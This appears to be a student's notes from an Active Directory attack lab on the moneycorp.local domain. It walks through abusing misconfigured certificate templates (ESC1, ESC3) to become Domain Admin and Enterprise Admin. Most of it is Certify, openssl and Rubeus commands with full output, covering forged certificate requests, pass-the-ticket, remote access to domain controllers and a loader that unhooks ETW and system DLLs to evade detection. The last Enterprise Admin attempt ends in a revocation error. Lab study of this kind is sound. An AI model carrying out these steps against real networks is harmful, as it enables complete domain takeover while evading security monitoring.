WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:15.7994434
C:\Users\student98>
.
The HTTPSCertificates template grants enrollment rights to RDPUsers group and allows requestor to supply Subject Name.
Recall that student98 is a member of RDPUsers group. This means that we can request certificate for any user as student98.
Let’s request a certificate for Domain Admin – Administrator:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
We copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem.
We need to convert it to PFX to use it. Use openssl binary on the student VM to do that. I will use SecretPass@123 as the export password.
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out C:\AD\Tools\esc1-DA.pfx
Use the PFX created above with Rubeus to request a TGT for DA – Administrator, [using dcorp domain]
summary:
c:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student98
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 40
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAplrRlQeBSoQfoyWgAjdW8rLpCfXwWJjOCEgn3vbYMpbDhMsX
<snip>
As8EU3Mb0J5mlgFr3tyycV3YEkNLdIZq6pWwvdV5LfrFFQBVx9bW
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGYTCCBUmgAwIBAgITFQAAACjVCkCBIhFPpQAAAAAAKDANBgkqhkiG9w0BAQsF
<snip>
F4Dpukv2R3Xz62HSo0iyY1WSEsle0cBIOBFqdcnQVgRj7F3XqvNIVM3fua9wDYw4
TBoGjag=
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:10.2982772
c:\AD\Tools>notepad C:\ad\Tools\esc1.pem
c:\AD\Tools>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT
[*] Got domain: dollarcorp.moneycorp.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
<snip>
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!
ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 11/27/2025 5:26:07 AM
EndTime : 11/27/2025 3:26:07 PM
RenewTill : 12/4/2025 5:26:07 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : L1WkxZ3i0esXLN9gV/lm7A==
ASREP (key) : E23E84B1C77442465881A781D384B555
c:\AD\Tools>klist
Current LogonId is 0:0x31e69f3e
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/27/2025 5:26:07 (local)
End Time: 11/27/2025 15:26:07 (local)
Renew Time: 12/4/2025 5:26:07 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\AD\Tools>winrs -r:dcorp-dc cmd /c set computername
COMPUTERNAME=DCORP-DC
c:\AD\Tools>winrs -r:dcorp-dc cmd /c set username
USERNAME=Administrator
c:\AD\Tools>
.
——
Next task
Awesome! We can use similar method to escalate to Enterprise Admin privileges. Request a certificate for Enterprise Administrator – Administrator
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
Save the certificate to esc1-EA.pem and convert it to PFX. I will use SecretPass@123 as the export password:
notepad C:\AD\Tools\esc1-EA.pem
.
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfxUse Rubeus to request TGT for Enterprise Administrator – Administrator
Use Rubeus to request TGT for Enterprise Administrator – Administrator
Rubeus.exe asktgt /user:administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /certificate:esc1-DA.pfx /password:SecretPass@123 /pttFinally, access mcorp-dc!
winrs -r:mcorp-dc cmd /c set computernameWe have EA privileges!
summary:
C:\Users\student98>cd c:\ad\Tools\1
c:\AD\Tools\1>klist purge
Current LogonId is 0:0x32e4f330
Deleting all tickets:
Ticket(s) purged!
c:\AD\Tools\1>C:\AD\Tools\Loader.exe -path C:\AD\Tools\1\Rubeus.exe -args asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\1\Rubeus.exe Arguments : asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\Administrator'
[*] Using domain controller: 172.16.1.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
[+] Ticket successfully imported!
ServiceName : krbtgt/moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : MONEYCORP.LOCAL
StartTime : 11/28/2025 5:07:48 AM
EndTime : 11/28/2025 3:07:48 PM
RenewTill : 12/5/2025 5:07:48 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : v2bJ91CiAXmDRIhj42rY1Q==
ASREP (key) : 3408A867E1594643CA6B3317F40F7CB1
c:\AD\Tools\1>klist
Current LogonId is 0:0x32e4f330
Cached Tickets: (1)
#0> Client: Administrator @ MONEYCORP.LOCAL
Server: krbtgt/moneycorp.local @ MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/28/2025 5:07:48 (local)
End Time: 11/28/2025 15:07:48 (local)
Renew Time: 12/5/2025 5:07:48 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\AD\Tools\1>winrs -r:mcorp-dc cmd /c set computername
COMPUTERNAME=MCORP-DC
c:\AD\Tools\1>winrs -r:mcorp-dc cmd /c set username
USERNAME=Administrator
c:\AD\Tools\1>
.
extra note:
lab 21.1 solved [ the error – KDC_ERR_PADATA_TYPE_NOSUPP ] , by unzipping rubeus.exe from the tools.zip , and put esc1-EA.pem and esc1-EA.pfx there [ in c:\ad\tools\1 ] too
next
2 – Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin
If we list vulnerable templates in moneycorp, we get the following result:
C:\AD\Tools\Certify.exe find /vulnerablec:\AD\Tools>C:\AD\Tools\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:16.2420492
c:\AD\Tools>
.
The “SmartCardEnrollment-Agent” template has EKU for “Certificate Request Agent” and grants enrollment rights to Domain users. If we can find another template that has an EKU that allows for domain authentication and has application policy requirement of certificate request agent, we can request certificate on behalf of any user.
Now, request an Enrollment Agent Certificate from the template "SmartCardEnrollment-Agent":
C:\AD\Tools\3>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@12Like earlier, now save the certificate text to esc3.pem and convert to pfx. Let’s keep using SecretPass@123 as the export password:
C:\AD\Tools\3>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\3\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\3\esc3-da1.pfxNow we can use the Enrollment Agent Certificate to request a certificate for DA from the template SmartCardEnrollment-Users:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123Once again, save the certificate text to esc3-da1.pem and convert the pem to pfx. Still using SecretPass@123 as the export password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-DA.pfxUse the esc3-DA created above with Rubeus to request a TGT for DA
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /pttCheck if we actually have DA privileges now:
winrs -r:dcorp-dc cmd /c set username.
summary:
so 1st start with
.
C:\Users\student98>cd c:\ad\Tools\3
c:\AD\Tools\3>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student98
[*] No subject name specified, using current context as subject.
[*] Template : SmartCardEnrollment-Agent
[*] Subject : CN=student98, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 49
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA4AoR+dGTeLl+jSNzMBNcodh7FyLzNrvNyoFF6SzrZaYRybsG
<snip>
R+j88zO7FSReSrorxm6e777u/n61Qqqiew98lNq0JsB9ZFIcbeWVRe8=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGXDCCBUSgAwIBAgITFQAAADEEGtjgiX1M4AAAAAAAMTANBgkqhkiG9w0BAQsF
<snip>
bSeKIknTb13Z0c7HUC6uKSKllhYEBZcYQ9VcLtyXKNja06F+Lsm83hpLrGvFoSEW
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:11.2583102
c:\AD\Tools\3>
and then
c:\AD\Tools\3>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student98
[*] Template : SmartCardEnrollment-Users
[*] On Behalf Of : dcorp\administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 47
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAv9n4v0nnl65CldgzIcq0M4hupDsXE4Uip0qz7THoWkq9qCrF
<snip>
siYaTcIDBR/I1DtgsB1al7uULtYgk4dSrfl5rpM+Eb0m35Awppy3PvEOmIPxsPdI
ot4FFUZuMBkmXcbFQW7Yx7Rye5t4lKr4hkpCyOKxosne3Bh2kyAP5ws=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGiTCCBXGgAwIBAgITFQAAAC9mGeTq4vSc3QAAAAAALzANBgkqhkiG9w0BAQsF
<snip>
RlMMc+WnM1eWToVIjAOixqSk6nIwbBjC80Lq6ZZ15qAqvsSP0zBcdjrgw7ZF
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:10.4191618
c:\AD\Tools\3>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\3\esc3-da1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\3\esc3-da1.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
unable to write 'random state'
c:\AD\Tools\3>dir
Volume in drive C has no label.
Volume Serial Number is 1A5A-FDE2
Directory of c:\AD\Tools\3
11/28/2025 07:47 AM <DIR> .
11/28/2025 07:02 AM <DIR> ..
11/28/2025 07:06 AM 3,355 esc3-agent.pfx
11/28/2025 07:32 AM 4,014 esc3-da.pem
11/28/2025 07:13 AM 3,355 esc3-DA.pfx
11/28/2025 07:38 AM 4,062 esc3-da1.pem
11/28/2025 07:47 AM 3,395 esc3-da1.pfx
11/28/2025 07:05 AM 3,996 esc3.pem
01/02/2025 12:28 AM 1,342,976 Rubeus.exe
7 File(s) 1,365,153 bytes
2 Dir(s) 8,426,704,896 bytes free
c:\AD\Tools\3>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-da1.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgt /user:administrator /certificate:esc3-da1.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT
[*] Got domain: dollarcorp.moneycorp.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
<snip>
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!
ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 11/28/2025 7:49:03 AM
EndTime : 11/28/2025 5:49:03 PM
RenewTill : 12/5/2025 7:49:03 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : G2QX0temy6Z0REK40MEHTg==
ASREP (key) : 02317191C2207D98FC106E4BD65EF794
c:\AD\Tools\3>klist
Current LogonId is 0:0x33116f1d
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/28/2025 7:49:03 (local)
End Time: 11/28/2025 17:49:03 (local)
Renew Time: 12/5/2025 7:49:03 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\AD\Tools\3>winrs -r:dcorp-dc cmd /c set computername
COMPUTERNAME=DCORP-DC
c:\AD\Tools\3>
.
——————————
next task
To escalate to Enterprise Admin, we just need to make changes to request to the SmartCardEnrollmentUsers template and Rubeus.
Please note that we are using ‘/onbehalfof: mcorp\administrator’ here:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123c:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student98
[*] Template : SmartCardEnrollment-Users
[*] On Behalf Of : mcorp\administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[!] CA Response : The submission failed: Error Verifying Request Signature or Signing Certificate The revocation function was unable to check revocation because the revocation server was offline. 0x80092013 (-2146885613 CRYPT_E_REVOCATION_OFFLINE)
[!] Last status : 0x80092013
[*] Request ID : 36
[X] Error downloading certificate: System.Exception: Cert not yet issued yet! (iDisposition: 1)
